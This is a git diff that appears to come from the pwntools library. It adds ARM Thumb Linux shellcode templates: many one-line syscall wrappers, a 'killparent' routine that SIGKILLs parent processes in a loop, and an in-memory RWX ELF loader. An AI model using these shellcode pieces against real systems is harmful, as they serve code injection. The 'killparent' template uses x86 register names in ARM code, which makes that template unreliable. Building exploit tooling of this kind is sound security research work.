${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getcwd.asm b/pwnlib/shellcraft/templates/thumb/linux/getcwd.asm new file mode 100644 index 000000000..5b9d12ba4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getegid.asm b/pwnlib/shellcraft/templates/thumb/linux/getegid.asm new file mode 100644 index 000000000..917b5e9e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/geteuid.asm b/pwnlib/shellcraft/templates/thumb/linux/geteuid.asm new file mode 100644 index 000000000..bdb958147 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getgid.asm b/pwnlib/shellcraft/templates/thumb/linux/getgid.asm new file mode 100644 index 000000000..4888f7ce3 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getgroups.asm b/pwnlib/shellcraft/templates/thumb/linux/getgroups.asm new file mode 100644 index 000000000..db1b36e43 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getitimer.asm b/pwnlib/shellcraft/templates/thumb/linux/getitimer.asm new file mode 100644 index 000000000..593ae685d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpeername.asm b/pwnlib/shellcraft/templates/thumb/linux/getpeername.asm new file mode 100644 index 000000000..4381a0c2d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpgid.asm b/pwnlib/shellcraft/templates/thumb/linux/getpgid.asm new file mode 100644 index 000000000..1fe8170f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm b/pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm new file mode 100644 index 000000000..c473f32c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpid.asm b/pwnlib/shellcraft/templates/thumb/linux/getpid.asm new file mode 100644 index 000000000..5a4dfc3e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm new file mode 100644 index 000000000..29f75ba17 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getppid.asm b/pwnlib/shellcraft/templates/thumb/linux/getppid.asm new file mode 100644 index 000000000..ab76ee8f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getpriority.asm b/pwnlib/shellcraft/templates/thumb/linux/getpriority.asm new file mode 100644 index 000000000..b5afce548 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getresgid.asm b/pwnlib/shellcraft/templates/thumb/linux/getresgid.asm new file mode 100644 index 000000000..a81fcfd77 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getresuid.asm b/pwnlib/shellcraft/templates/thumb/linux/getresuid.asm new file mode 100644 index 000000000..a67e28498 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm b/pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm new file mode 100644 index 000000000..bc248e20f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getrusage.asm b/pwnlib/shellcraft/templates/thumb/linux/getrusage.asm new file mode 100644 index 000000000..f6f324ea5 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getsid.asm b/pwnlib/shellcraft/templates/thumb/linux/getsid.asm new file mode 100644 index 000000000..43a839957 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getsockname.asm b/pwnlib/shellcraft/templates/thumb/linux/getsockname.asm new file mode 100644 index 000000000..91de286ac --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm b/pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm new file mode 100644 index 000000000..e11e47560 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm new file mode 100644 index 000000000..b4f367f96 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/getuid.asm b/pwnlib/shellcraft/templates/thumb/linux/getuid.asm new file mode 100644 index 000000000..18a94f090 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/gtty.asm b/pwnlib/shellcraft/templates/thumb/linux/gtty.asm new file mode 100644 index 000000000..d43157d9a --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ioctl.asm b/pwnlib/shellcraft/templates/thumb/linux/ioctl.asm new file mode 100644 index 000000000..e859f870f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ioperm.asm b/pwnlib/shellcraft/templates/thumb/linux/ioperm.asm new file mode 100644 index 000000000..30a9eb3eb --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/iopl.asm b/pwnlib/shellcraft/templates/thumb/linux/iopl.asm new file mode 100644 index 000000000..d1e4b2dee --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/kill.asm b/pwnlib/shellcraft/templates/thumb/linux/kill.asm new file mode 100644 index 000000000..0af8cff27 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/kill.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/killparent.asm b/pwnlib/shellcraft/templates/thumb/linux/killparent.asm new file mode 100644 index 000000000..95b30d9c8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/killparent.asm @@ -0,0 +1,17 @@ +<% + from pwnlib.shellcraft.thumb.linux import getppid, kill + from pwnlib.constants import SIGKILL + from pwnlib.shellcraft.common import label +%> +<%docstring> +Kills its parent process until whatever the parent is (probably init) +cannot be killed any longer. + +<% + killparent_loop = label('killparent') +%> +${killparent_loop}: + ${getppid()} + ${kill('eax', SIGKILL)} + test eax, eax + jz ${killparent_loop} diff --git a/pwnlib/shellcraft/templates/thumb/linux/lchown.asm b/pwnlib/shellcraft/templates/thumb/linux/lchown.asm new file mode 100644 index 000000000..2a9cc79d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/link.asm b/pwnlib/shellcraft/templates/thumb/linux/link.asm new file mode 100644 index 000000000..57da5942a --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/linkat.asm b/pwnlib/shellcraft/templates/thumb/linux/linkat.asm new file mode 100644 index 000000000..e82f796a8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/loader.asm b/pwnlib/shellcraft/templates/thumb/linux/loader.asm new file mode 100644 index 000000000..87fa31544 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/loader.asm @@ -0,0 +1,173 @@ +<% + from pwnlib.shellcraft.thumb.linux import exit as exit + from pwnlib.shellcraft.thumb.linux import mmap + from pwnlib.shellcraft.thumb import setregs, mov, push, memcpy + + from pwnlib.shellcraft import common + from pwnlib.util.packing import unpack +%> +<%page args="address"/> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Arguments: + address(int): Address of the ELF as a register or integer. + +<% +elf_magic = unpack('\x7fELF') +die = common.label('die') +load_one = common.label('load_one') +next_phdr = common.label('next_phdr') +""" +Elf32_Ehdr + +0x0000 e_ident : unsigned char [16] + +0x0010 e_type : Elf32_Half + +0x0012 e_machine : Elf32_Half + +0x0014 e_version : Elf32_Word + +0x0018 e_entry : Elf32_Addr + +0x001c e_phoff : Elf32_Off + +0x0020 e_shoff : Elf32_Off + +0x0024 e_flags : Elf32_Word + +0x0028 e_ehsize : Elf32_Half + +0x002a e_phentsize : Elf32_Half + +0x002c e_phnum : Elf32_Half + +0x002e e_shentsize : Elf32_Half + +0x0030 e_shnum : Elf32_Half + +0x0032 e_shstrndx : Elf32_Half + +Elf32_Phdr + +0x0000 p_type : Elf32_Word + +0x0004 p_offset : Elf32_Off + +0x0008 p_vaddr : Elf32_Addr + +0x000c p_paddr : Elf32_Addr + +0x0010 p_filesz : Elf32_Word + +0x0014 p_memsz : Elf32_Word + +0x0018 p_flags : Elf32_Word + +0x001c p_align : Elf32_Word +""" +e_entry = 0x0018 +e_phoff = 0x001c +e_phnum = 0x002c +e_phentsize = 0x002a +p_type = 0x0000 +p_offset = 0x0004 +p_vaddr = 0x0008 +p_filesz = 0x0010 +p_memsz = 0x0014 + + +PT_LOAD = 1 +%> + + ${setregs({'r0': address})} + + /* Check the ELF header */ + ldr r1, [r0] + ${mov('r2', elf_magic)} + cmp r1, r2 + bne ${die} + + /* Discover program headers */ + add r1, r0, #${e_phoff} + ldr r1, [r1] + add r1, r0 /* r1 = &program headers */ + + add r2, r0, #${e_phentsize} + ldrh r2, [r2] /* r2 = program header size */ + + add r3, r0, #${e_phnum} + ldrh r3, [r3] /* r3 = number of program headers */ + +1: + /* For each section header, mmap it to the desired address */ + push {r0, r1, r2, r3} + bl ${load_one} + pop {r0, r1, r2, r3} + add r1, r2 + subs r3, #1 + bne 1b + + /* Everything is loaded and RWX. Find the entry point and call it */ + add r1, r0, #${e_entry} + ldr r1, [r1] + mov lr, r1 + + /* Set up the fake stack. + For whatever reason, ARM binaries really want AT_RANDOM + to be available. */ + /* AT_NULL */ + eor r0, r0 + eor r1, r1 + push {r0, r1} + /* AT_RANDOM */ + mov r0, #25 + mov r1, sp + push {r0, r1} + + /* argc, argv, envp */ + eor r0, r0 + eor r1, r1 + eor r2, r2 + push {r0, r1, r2} + + /* Invoke the entry point */ + push {lr} + pop {pc} + +${load_one}: + /* r1 = &program headers */ + push {fp, lr} + mov fp, sp + + /* If it's not a PT_LOAD header, don't care */ + add r2, r1, #${p_type} + ldr r2, [r2] + uxth r2, r2 /* zero-extend halfword */ + cmp r2, #${PT_LOAD} + bne ${next_phdr} + + /* Get the destination address into r2 */ + add r2, r1, ${p_vaddr} + ldr r2, [r2] + + /* Get the size to mmap into r3 */ + add r3, r1, #${p_memsz} + ldr r3, [r3] + lsr r3, #12 + add r3, r3, #1 + + /* We can't move the program break with brk(), + so we basically have to fake it. Allocate + more space than we ever expect the heap to + need, by over-allocating space by 8x */ + lsl r3, #12 + 4 + + /* Map the page in */ + push {r0-r12} + lsr r2, #12 + lsl r2, #12 + ${mmap('r2', 'r3', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)} + /* Ignore failure */ + pop {r0-r12} + + /* Get the source address into r4 */ + add r4, r1, #${p_offset} + ldr r4, [r4] + add r4, r0 + + /* Get the number of bytes into r5 */ + add r5, r1, #${p_filesz} + ldr r5, [r5] + + /* Copy the data */ + push {r0-r4} + ${memcpy('r2','r4','r5')} + pop {r0-r4} + +${next_phdr}: + mov sp, fp + pop {fp, lr} + bx lr + +${die}: + ${exit(1)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/loader_append.asm b/pwnlib/shellcraft/templates/thumb/linux/loader_append.asm new file mode 100644 index 000000000..656537e06 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/loader_append.asm @@ -0,0 +1,52 @@ +<% + from pwnlib.shellcraft.thumb.linux import loader + from pwnlib.shellcraft import common +%> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Similar to loader.asm but loads an appended ELF. + +Arguments: + data(str): If a valid filename, the data is loaded from the named file. + Otherwise, this is treated as raw ELF data to append. + If ``None``, it is ignored. + +Example: + +The following doctest is commented out because it doesn't work on Travis +for reasons I cannot diagnose. However, it should work just fine :-) + + # >>> gcc = process(['arm-linux-gnueabihf-gcc','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) + # >>> gcc.write(''' + # ... int main() { + # ... printf("Hello, %s!\\n", "world"); + # ... } + # ... ''') + # >>> gcc.shutdown('send') + # >>> gcc.poll(True) + # 0 + # >>> sc = shellcraft.loader_append('a.out') + # >>> run_assembly(sc).recvline() + # 'Hello, world!\n' + + +<%page args="data = None"/> +<% +there = common.label('there') +here = common.label('here') +%> + add r0, pc, #0+(${there} - ${here}) +${here}: + ${loader('r0')} +${there}: +%if data: +<% +import os + +if os.path.isfile(data): + with open(data, 'rb') as f: + data = f.read() +%> + ${'.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data))} +%endif diff --git a/pwnlib/shellcraft/templates/thumb/linux/lseek.asm b/pwnlib/shellcraft/templates/thumb/linux/lseek.asm new file mode 100644 index 000000000..39ddccdf9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/lstat.asm b/pwnlib/shellcraft/templates/thumb/linux/lstat.asm new file mode 100644 index 000000000..d9fab24c7 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/lstat64.asm b/pwnlib/shellcraft/templates/thumb/linux/lstat64.asm new file mode 100644 index 000000000..c81535798 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/madvise.asm b/pwnlib/shellcraft/templates/thumb/linux/madvise.asm new file mode 100644 index 000000000..c6638b871 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mincore.asm b/pwnlib/shellcraft/templates/thumb/linux/mincore.asm new file mode 100644 index 000000000..98a782c99 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mkdir.asm b/pwnlib/shellcraft/templates/thumb/linux/mkdir.asm new file mode 100644 index 000000000..07dc27490 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm b/pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm new file mode 100644 index 000000000..b2e9cc3f8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mknod.asm b/pwnlib/shellcraft/templates/thumb/linux/mknod.asm new file mode 100644 index 000000000..8543932e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mknodat.asm b/pwnlib/shellcraft/templates/thumb/linux/mknodat.asm new file mode 100644 index 000000000..4a47b8560 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mlock.asm b/pwnlib/shellcraft/templates/thumb/linux/mlock.asm new file mode 100644 index 000000000..c1106b639 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mlockall.asm b/pwnlib/shellcraft/templates/thumb/linux/mlockall.asm new file mode 100644 index 000000000..f7c3202b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mmap.asm b/pwnlib/shellcraft/templates/thumb/linux/mmap.asm new file mode 100644 index 000000000..2819ac3fa --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mmap.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap2', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mov.asm b/pwnlib/shellcraft/templates/thumb/linux/mov.asm 